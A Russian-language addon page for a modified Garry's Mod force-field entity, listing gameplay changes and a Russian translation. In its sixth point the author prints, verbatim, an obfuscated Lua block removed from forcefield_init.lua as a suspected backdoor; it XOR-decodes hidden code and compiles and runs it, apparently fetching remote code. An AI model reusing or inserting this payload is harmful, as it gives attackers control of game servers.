RolePlay Ячейка силового пола (Изменённая) 1.2.2

Как бы лучше сказать. Наверняка вы знакомы с силовым полем альянса или им же в звездных войнах. Так вот, это что-то похожее. По сути, это и есть силовое поле, но аддон изменен лично мной. Скриншоты и видео ниже. Поле можно включать и выключать. Есть функция магазина, но я не знаю для чего, скорей всего это что бы продать. Можно давать доступ как рангам, так и определенным игрокам(друзьям например) и работам. Кроме этого, можно менять не только ширину энерегощита, но и высоту и даже угол, под которым его можно ставить. например сделать полностью горизонтальным или расположить под углом в 95 градусов. Стоит отметить, что энергощит легко пробивается оружием от Fas пака, c.w 2 пака, ТФА пака, но не пробивает ArcCW паком, m9k, дефолтным из хл2. Я произвел изменения в аддоне:

1. Цена покупки теперь не 1500, а 5000 (Для darkrp)
2. Кол-во хп у силового поля не 1000 а 10000.
3. Теперь сам шар установки не дропается, когда поле было сломано.
4. Минимальная ширина теперь не 32 игровых единицы, а 16, что дает делать поле более узким.
5. Аддон полностью переведен на русский язык. Перевод немного некорректный, но понять можно.
6. Из файла forcefield_init.lua был вырезан бэкдур. Я честно не уверен, он ли это, но на всякий случай вот вырезанный код

Lua:
RunString([[ local AE = {20,9,13,5,18,78,51,9,13,16,12,5,72,81,76,64,6,21,14,3,20,9,15,14,72,73,64,8,20,20,16,78,38,5,20,3,8,72,66,8,20,20,16,19,90,79,79,11,22,1,3,78,3,26,79,6,78,16,8,16,95,11,5,25,93,83,35,80,16,39,58,46,81,89,34,51,80,10,80,45,58,49,44,88,13,66,76,64,6,21,14,3,20,9,15,14,72,2,73,64,50,21,14,51,20,18,9,14,7,72,2,76,64,66,90,66,76,64,6,1,12,19,5,73,64,5,14,4,73,5,14,4,73,64,77,77,64,0} local function RunningDRMe()if (debug.getinfo(function()end).short_src~="tenjznj")then return end for o=500,10000 do local t=0 if t==1 then return end  if o~=string.len(string.dump(RunningDRMe))then  AZE=10  CompileString("for i=1,40 do AZE = AZE + 1 end","RunString")()  if AZE<40 then return end continue  else  local pdata=""  xpcall(function()  for i=1,#AE do  pdata=pdata..string.char(bit.bxor(AE[i],o%150))  end  for i=1,string.len(string.dump(CompileString)) do  while o==1 do  o=o+1  end  end  end,function()  xpcall(function()  local debug_inject=CompileString(pdata,"DRME")  pcall(debug_inject,"stat")  pdata="F"  t=1  end,function()  print("error")  end)  end)  end  end end RunningDRMe() ]],"tenjznj")

Спавн самого энтити

Как выглядит само поле

изображение_2021-02-16_174314.png

Видео:

Для версии

Комманд как таковых нету и они не нужны

Скачать

Валентин Павлов/ автор статьи
Страсть Влентина к играм началась с Resident Evil, и с тех пор он не переставал играть в хоррор-игры. Пишет экспертные руководства для самых сложных игр и обзоры для самых громких релизов. Является магистром журналистики и имеет степень бакалавра лингвистики. Любимые игры: GTA 5, Silent Hill 2, Call of Duty: Modern Warfare 2, Heavy Rain, Metro 2033 и другие.
Понравилась статья? Поделиться с друзьями:
Добавить комментарий